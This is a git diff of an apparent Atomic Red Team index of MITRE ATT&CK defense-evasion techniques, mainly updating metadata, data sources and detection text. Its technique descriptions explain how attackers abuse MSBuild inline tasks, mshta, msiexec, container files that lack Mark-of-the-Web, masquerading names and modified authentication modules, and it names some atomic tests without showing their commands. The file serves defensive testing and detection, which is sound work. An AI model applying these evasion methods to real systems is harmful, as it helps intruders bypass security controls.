@@ -34267,38 +26666,36 @@ defense-evasion: - url: https://msdn.microsoft.com/library/dd393574.aspx description: Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016. source_name: MSDN MSBuild + - source_name: Microsoft MSBuild Inline Tasks 2017 + url: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element + description: Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved + March 5, 2021. - source_name: LOLBAS Msbuild url: https://lolbas-project.github.io/lolbas/Binaries/Msbuild/ description: LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: MSBuild - description: |- - Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) - - Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. 
MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild) - id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96 type: attack-pattern kill_chain_phases: - phase_name: defense-evasion kill_chain_name: mitre-attack - modified: '2020-06-08T23:29:28.074Z' + modified: '2021-03-05T22:25:48.777Z' created: '2020-03-27T21:50:26.042Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - " .NET Framework version 4 or higher" + x_mitre_contributors: + - Carrie Roberts, @OrOneEqualsOne + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed. - x_mitre_data_sources: - - Process monitoring - x_mitre_platforms: - - Windows + x_mitre_system_requirements: + - " .NET Framework version 4 or higher" + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1127.001 atomic_tests: - name: MSBuild Bypass Using Inline Tasks (C#) 
@@ -34420,13 +26817,67 @@ defense-evasion: Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_platforms: - Windows atomic_tests: [] + T1553.005: + technique: + id: attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961 + description: |- + Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) + + Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. 
After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) + name: Mark-of-the-Web Bypass + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1553.005 + url: https://attack.mitre.org/techniques/T1553/005 + - source_name: Microsoft Zone.Identifier 2020 + url: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8 + description: Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved + February 22, 2021. + - source_name: Beek Use of VHD Dec 2020 + url: https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 + description: Beek, C. (2020, December 3). Investigating the Use of VHD Files + By Cybercriminals. Retrieved February 22, 2021. + - source_name: Outflank MotW 2020 + url: https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/ + description: Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s + perspective. Retrieved February 22, 2021. + - source_name: Intezer Russian APT Dec 2020 + url: https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ + description: 'Kennedy, J. (2020, December 9). A Zebra in Gopher''s Clothing: + Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, + 2021.' 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-13T22:47:08.289Z' + created: '2021-02-22T14:20:31.650Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Christiaan Beek, @ChristiaanBeek + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Metadata' + x_mitre_detection: Monitor compressed/archive and image files downloaded from + the Internet as the contents may not be tagged with the MOTW. Data and events + should not be viewed in isolation, but as part of a chain of behavior that + could lead to other activities. + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Anti-virus, Application control + atomic_tests: [] T1036.004: technique: external_references: @@ -34461,7 +26912,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T20:21:11.895Z' + modified: '2021-04-24T13:24:45.580Z' created: '2020-02-10T20:30:07.426Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -34479,10 +26930,11 @@ defense-evasion: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Service: Service Creation' + - 'Scheduled Job: Scheduled Job Metadata' + - 'Scheduled Job: Scheduled Job Modification' x_mitre_platforms: - Windows - Linux 
@@ -34520,13 +26972,14 @@ defense-evasion: elevation_required: true T1036: technique: - id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Masquerading - description: |- - Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. - - Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) + created: '2017-05-31T21:30:38.511Z' + modified: '2021-04-24T13:24:45.840Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1036 @@ -34538,7 +26991,7 @@ defense-evasion: url: https://lolbas-project.github.io/ description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. - - source_name: Endgame Masquerade Ball + - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf 
@@ -34546,31 +26999,15 @@ defense-evasion: url: https://twitter.com/ItsReallyNick/status/1055321652777619457 description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-09T13:54:28.727Z' - created: '2017-05-31T21:30:38.511Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: |- - Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. + description: |- + Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. - If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. 
(Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) - - Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”. - x_mitre_defense_bypassed: - - Application control by file name or path - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring - - Binary file metadata + Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) + name: Masquerading + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0 + x_mitre_is_subtechnique: false + x_mitre_version: '1.4' x_mitre_contributors: - Oleg Kolesnikov, Securonix - Nick Carr, FireEye 
@@ -34578,8 +27015,29 @@ defense-evasion: - Felipe Espósito, @Pr0teus - Elastic - Bartosz Jerzman - x_mitre_version: '1.3' - x_mitre_is_subtechnique: false + x_mitre_data_sources: + - 'Image: Image Metadata' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Service: Service Creation' + - 'Scheduled Job: Scheduled Job Metadata' + - 'Scheduled Job: Scheduled Job Modification' + - 'File: File Metadata' + - 'Process: Process Metadata' + - 'File: File Modification' + x_mitre_defense_bypassed: + - Application control by file name or path + x_mitre_detection: |- + Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. + + If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) + + Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”. + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers identifier: T1036 atomic_tests: - name: System File Copied to Unusual Location 
@@ -34596,6 +27054,15 @@ defense-evasion: name: command_prompt T1036.005: technique: + id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 + description: |- + Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. + + Adversaries may also use the same icon of the file they are trying to mimic. + name: Match Legitimate Name or Location + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1036.005 @@ -34603,7 +27070,7 @@ defense-evasion: - external_id: CAPEC-177 source_name: capec url: https://capec.mitre.org/data/definitions/177.html - - source_name: Endgame Masquerade Ball + - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf 
@@ -34611,38 +27078,37 @@ defense-evasion: url: https://twitter.com/ItsReallyNick/status/1055321652777619457 description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Match Legitimate Name or Location - description: |- - Adversaries may match or approximate the name or location of legitimate files when naming/placing their files. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. - - Adversaries may also use the same icon of the file they are trying to mimic. - id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 + - source_name: Docker Images + url: https://docs.docker.com/engine/reference/commandline/images/ + description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:11:45.970Z' + modified: '2021-04-20T19:23:37.762Z' created: '2020-02-10T20:43:10.239Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_defense_bypassed: - - Application control by file name or path - x_mitre_detection: |- - Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. - - If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. 
Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Binary file metadata x_mitre_platforms: - Linux - macOS - Windows + - Containers + x_mitre_data_sources: + - 'Image: Image Metadata' + - 'File: File Metadata' + - 'Process: Process Metadata' + x_mitre_detection: |- + Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. + + If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. 
(Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) + + In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users. + x_mitre_defense_bypassed: + - Application control by file name or path + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee atomic_tests: [] T1556: technique: @@ -34658,6 +27124,10 @@ defense-evasion: description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - source_name: Xorrior Authorization Plugins + url: https://xorrior.com/persistent-credential-theft/ + description: Chris Ross. (2018, October 17). Persistent Credential Theft with + Authorization Plugins. Retrieved April 22, 2021. - url: https://technet.microsoft.com/en-us/library/dn487457.aspx description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. 
@@ -34666,18 +27136,10 @@ defense-evasion: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Modify Authentication Process - description: "Adversaries may modify authentication mechanisms and processes - to access user credentials or enable otherwise unwarranted access to accounts. - The authentication process is handled by mechanisms, such as the Local Security - Authentication Server (LSASS) process and the Security Accounts Manager (SAM) - on Windows or pluggable authentication modules (PAM) on Unix-based systems, - responsible for gathering, storing, and validating credentials. \n\nAdversaries - may maliciously modify a part of this process to either reveal credentials - or bypass authentication mechanisms. Compromised credentials or access may - be used to bypass access controls placed on various resources on systems within - the network and may even be used for persistent access to remote systems and - externally available services, such as VPNs, Outlook Web Access and remote - desktop. " + description: |- + Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. 
Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84 type: attack-pattern kill_chain_phases: @@ -34685,15 +27147,20 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.743Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-26T20:08:31.712Z' created: '2020-02-11T19:01:56.887Z' + x_mitre_contributors: + - Chris Ross @xorrior x_mitre_data_sources: - - File monitoring - - Authentication logs - - API monitoring - - Windows Registry - - Process monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification 
@@ -34705,18 +27172,20 @@ defense-evasion: exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools - such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure - robust, consistent account activity audit policies across the enterprise and - with externally accessible services. (Citation: TechNet Audit Policy) Look - for suspicious account behavior across systems that share accounts, either - user, admin, or service accounts. Examples: one account logged into multiple - systems simultaneously; multiple accounts logged into the same machine simultaneously; - accounts logged in at odd times or outside of business hours. Activity may - be from interactive login sessions or process ownership from accounts being - used to execute binaries on a remote system as a particular account. Correlate - other security systems with login information (e.g., a user has an active - login session but has not entered the building or does not have VPN access)." - x_mitre_version: '1.1' + such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor + for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: + Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity + audit policies across the enterprise and with externally accessible services. + (Citation: TechNet Audit Policy) Look for suspicious account behavior across + systems that share accounts, either user, admin, or service accounts. Examples: + one account logged into multiple systems simultaneously; multiple accounts + logged into the same machine simultaneously; accounts logged in at odd times + or outside of business hours. 
Activity may be from interactive login sessions + or process ownership from accounts being used to execute binaries on a remote + system as a particular account. Correlate other security systems with login + information (e.g., a user has an active login session but has not entered + the building or does not have VPN access)." + x_mitre_version: '2.0' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -34747,7 +27216,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:55:23.798Z' + modified: '2021-04-20T14:51:01.759Z' created: '2019-08-30T18:03:05.864Z' x_mitre_detection: Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such @@ -34758,18 +27227,23 @@ defense-evasion: by the cloud provider, to help distinguish valid, expected actions from malicious ones. x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Stop' + - 'Instance: Instance Start' + - 'Instance: Instance Creation' + - 'Instance: Instance Modification' + - 'Instance: Instance Deletion' + - 'Snapshot: Snapshot Creation' + - 'Snapshot: Snapshot Modification' + - 'Snapshot: Snapshot Deletion' + - 'Volume: Volume Creation' + - 'Volume: Volume Modification' + - 'Volume: Volume Deletion' x_mitre_is_subtechnique: false - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_permissions_required: - User x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1112: technique: 
@@ -34842,11 +27316,12 @@ defense-evasion: x_mitre_defense_bypassed: - Host forensic analysis x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' x_mitre_contributors: - Bartosz Jerzman - Travis Smith, Tripwire 
@@ -35033,15 +27508,57 @@ defense-evasion: for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)" x_mitre_data_sources: - - Network device run-time memory - - Network device configuration - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] T1218.005: technique: - id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade + created: '2020-01-23T19:32:49.557Z' + modified: '2020-12-30T14:29:06.462Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1218.005 + url: https://attack.mitre.org/techniques/T1218/005 + - source_name: Cylance Dust Storm + description: Gross, J. (2016, February 23). Operation Dust Storm. Retrieved + September 19, 2017. + url: https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf + - source_name: Red Canary HTA Abuse Part Deux + description: McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) + Abuse, Part Deux. Retrieved October 27, 2017. + url: https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/ + - url: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html + description: 'Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. + (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. + Retrieved October 27, 2017.' + source_name: FireEye Attacks Leveraging HTA + - description: Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis + Of Kovter Persistence. Retrieved December 5, 2017. + source_name: Airbus Security Kovter Analysis + url: https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/ + - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html + description: Carr, N., et al. 
(2017, April 24). FIN7 Evolution and the Phishing + LNK. Retrieved April 24, 2017. + source_name: FireEye FIN7 April 2017 + - source_name: Wikipedia HTML Application + description: Wikipedia. (2017, October 14). HTML Application. Retrieved October + 27, 2017. + url: https://en.wikipedia.org/wiki/HTML_Application + - source_name: MSDN HTML Applications + description: Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017. + url: https://msdn.microsoft.com/library/ms536471.aspx + - source_name: LOLBAS Mshta + url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/ + description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Mshta description: "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during 
@@ -35058,71 +27575,28 @@ defense-evasion: its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)" - name: Mshta - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1218.005 - url: https://attack.mitre.org/techniques/T1218/005 - - source_name: Cylance Dust Storm - description: Gross, J. (2016, February 23). Operation Dust Storm. Retrieved - September 19, 2017. - url: https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf - - source_name: Red Canary HTA Abuse Part Deux - description: McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) - Abuse, Part Deux. Retrieved October 27, 2017. - url: https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/ - - source_name: FireEye Attacks Leveraging HTA - description: 'Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. - (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. - Retrieved October 27, 2017.' - url: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html - - description: Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis - Of Kovter Persistence. Retrieved December 5, 2017. - source_name: Airbus Security Kovter Analysis - url: https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/ - - source_name: FireEye FIN7 April 2017 - description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing - LNK. Retrieved April 24, 2017. - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html - - source_name: Wikipedia HTML Application - description: Wikipedia. (2017, October 14). HTML Application. Retrieved October - 27, 2017. 
- url: https://en.wikipedia.org/wiki/HTML_Application - - source_name: MSDN HTML Applications - description: Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017. - url: https://msdn.microsoft.com/library/ms536471.aspx - - source_name: LOLBAS Mshta - url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/ - description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-20T22:35:27.613Z' - created: '2020-01-23T19:32:49.557Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank - - Ricardo Dias - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring + id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_defense_bypassed: + - Application control + - Digital Certificate Validation x_mitre_detection: |- Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed. Monitor use of HTA files. 
If they are not typically used within an environment then execution of them may be suspicious - x_mitre_defense_bypassed: - - Application control - - Digital Certificate Validation - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Process: Process Creation' + - 'File: File Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + x_mitre_contributors: + - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank + - Ricardo Dias + x_mitre_platforms: + - Windows identifier: T1218.005 atomic_tests: - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 
@@ -35375,17 +27849,11 @@ defense-evasion: name: powershell T1218.007: technique: - created: '2020-01-24T14:38:49.266Z' - modified: '2020-06-20T22:38:14.154Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 description: |- Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. - Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. + Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM 